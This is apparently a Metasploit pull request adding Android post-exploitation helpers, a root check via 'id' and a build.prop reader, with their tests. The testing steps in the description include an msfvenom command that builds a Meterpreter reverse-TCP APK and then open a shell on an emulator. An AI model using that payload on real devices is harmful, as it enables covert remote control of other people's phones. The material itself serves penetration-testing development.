### PR TITLE
Add Android POST API

### DIFF
--- a/lib/msf/core/post/android.rb
+++ b/lib/msf/core/post/android.rb
@@ -1,0 +1,8 @@
+# -*- coding: binary -*-
+
+module Msf::Post::Android
+
+  require 'msf/core/post/android/system'
+  require 'msf/core/post/android/priv'
+
+end

--- a/lib/msf/core/post/android/priv.rb
+++ b/lib/msf/core/post/android/priv.rb
@@ -1,0 +1,35 @@
+# -*- coding: binary -*-
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+
+module Msf
+class Post
+module Android
+module Priv
+
+  include Msf::Post::Common
+
+  public
+
+  # Returns whether we are running as root or not.
+  #
+  # @return [Boolean] TrueClass if as root, otherwise FalseClass.
+  def is_root?
+    id = cmd_exec('id')
+    uid = id.scan(/uid=(\d+)(.+)/).flatten.first
+    if uid =~ /^0$/
+      return true
+    else
+      return false
+    end
+  end
+
+  private
+
+  def get_id
+    cmd_exec('id')
+  end
+
+end ; end ; end ; end

--- a/lib/msf/core/post/android/priv.rb
+++ b/lib/msf/core/post/android/priv.rb
@@ -19,7 +19,7 @@ module Priv
   def is_root?
     id = cmd_exec('id')
     uid = id.scan(/uid=(\d+)(.+)/).flatten.first
-    if uid =~ /^0$/
+    if /^0$/ === uid
       return true
     else
       return false

--- a/lib/msf/core/post/android/system.rb
+++ b/lib/msf/core/post/android/system.rb
@@ -12,14 +12,12 @@ module System
   include Msf::Post::Common
   include Msf::Post::File
 
-  public
-
   # Returns system information from build.prop.
   #
   # @return [Hash] System information.
-  def get_sysinfo
+  def get_build_prop
     sys_data   = {}
-    build_prop = get_build_prop
+    build_prop = cmd_exec('cat /system/build.prop')
 
     return sys_data if build_prop.blank?
 
@@ -28,12 +26,6 @@ module System
     end
 
     return sys_data
-  end
-
-  private
-
-  def get_build_prop
-    cmd_exec('cat /system/build.prop')
   end
 
 end ; end ; end ; end

--- a/lib/msf/core/post/android/system.rb
+++ b/lib/msf/core/post/android/system.rb
@@ -1,0 +1,39 @@
+# -*- coding: binary -*-
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+
+module Msf
+class Post
+module Android
+module System
+
+  include Msf::Post::Common
+  include Msf::Post::File
+
+  public
+
+  # Returns system information from build.prop.
+  #
+  # @return [Hash] System information.
+  def get_sysinfo
+    sys_data   = {}
+    build_prop = get_build_prop
+
+    return sys_data if build_prop.blank?
+
+    build_prop.scan(/(.+)=(.+)/i).collect {|e| Hash[*e]}.each do |setting|
+      sys_data.merge!(setting)
+    end
+
+    return sys_data
+  end
+
+  private
+
+  def get_build_prop
+    cmd_exec('cat /system/build.prop')
+  end
+
+end ; end ; end ; end

--- a/spec/lib/msf/core/post/android/priv_spec.rb
+++ b/spec/lib/msf/core/post/android/priv_spec.rb
@@ -19,15 +19,15 @@ describe Msf::Post::Android::Priv do
   end
 
   describe '#is_root?' do
-    context 'when root' do
-      it 'returns TrueClass' do
+    context 'when not root' do
+      it 'returns FalseClass' do
         allow(subject).to receive(:cmd_exec).with('id').and_return(nonroot_id)
         expect(subject.is_root?).to be_falsey
       end
     end
 
-    context 'when non root' do
-      it 'reeturns FalseClass' do
+    context 'when root' do
+      it 'returns TrueClass' do
         allow(subject).to receive(:cmd_exec).with('id').and_return(root_id)
         expect(subject.is_root?).to be_truthy
       end

--- a/spec/lib/msf/core/post/android/priv_spec.rb
+++ b/spec/lib/msf/core/post/android/priv_spec.rb
@@ -1,0 +1,37 @@
+# -*- coding: binary -*-
+
+require 'msf/core/post/android/priv'
+
+describe Msf::Post::Android::Priv do
+
+  subject do
+    mod = Module.new
+    mod.extend(described_class)
+    mod
+  end
+
+  let(:nonroot_id) do
+    %Q|uid=10043(u0_a43) gid=10043(u0_a43) groups=1006(camera),1015(sdcard_rw),1028(sdcard_r),3003(inet)|
+  end
+
+  let(:root_id) do
+    %Q|uid=0(0)|
+  end
+
+  describe '#is_root?' do
+    context 'when root' do
+      it 'returns TrueClass' do
+        allow(subject).to receive(:cmd_exec).with('id').and_return(nonroot_id)
+        expect(subject.is_root?).to be_falsey
+      end
+    end
+
+    context 'when non root' do
+      it 'reeturns FalseClass' do
+        allow(subject).to receive(:cmd_exec).with('id').and_return(root_id)
+        expect(subject.is_root?).to be_truthy
+      end
+    end
+  end
+
+end

--- a/spec/lib/msf/core/post/android/system_spec.rb
+++ b/spec/lib/msf/core/post/android/system_spec.rb
@@ -23,7 +23,7 @@ ro.build.version.release=4.1.1
 
     it 'returns the android version' do
       allow(subject).to receive(:cmd_exec).and_return(build_prop_output)
-      expect(subject.get_sysinfo['ro.build.version.release']).to eq(expected_android_version)
+      expect(subject.get_build_prop['ro.build.version.release']).to eq(expected_android_version)
     end
   end
 

--- a/spec/lib/msf/core/post/android/system_spec.rb
+++ b/spec/lib/msf/core/post/android/system_spec.rb
@@ -1,0 +1,30 @@
+# -*- coding: binary -*-
+
+require 'msf/core/post/android/system'
+
+describe Msf::Post::Android::System do
+
+  subject do
+    mod = Module.new
+    mod.extend(described_class)
+    mod
+  end
+
+  let(:build_prop_output) do
+    %Q|ro.build.version.sdk=16
+ro.build.version.release=4.1.1
+|
+  end
+
+  describe '#get_sysinfo' do
+    let(:expected_android_version) do
+      '4.1.1'
+    end
+
+    it 'returns the android version' do
+      allow(subject).to receive(:cmd_exec).and_return(build_prop_output)
+      expect(subject.get_sysinfo['ro.build.version.release']).to eq(expected_android_version)
+    end
+  end
+
+end


### PR DESCRIPTION
This PR allows an Android post module to collect system information (and priv info).

Testing:
- [x] Travis should be green
- [x] Save this as a post module in your msf repo: https://gist.github.com/wchen-r7/d3a0effbaab3e1f7bf03
- [x] Start an android emulator
- [x] `./msfvenom -p android/meterpreter/reverse_tcp lhost=[ip] lport=[port] -f exe -o android.apk`
- [x] Start a handler for android/meterpreter/reverse_tcp
- [x] Install the APK with this script: #5885
- [x] At this point you should have a shell to your android emulator
- [x] Run the test module, you should see the sys info as a hash, and false indicates you're not root (well, unless you actually are)
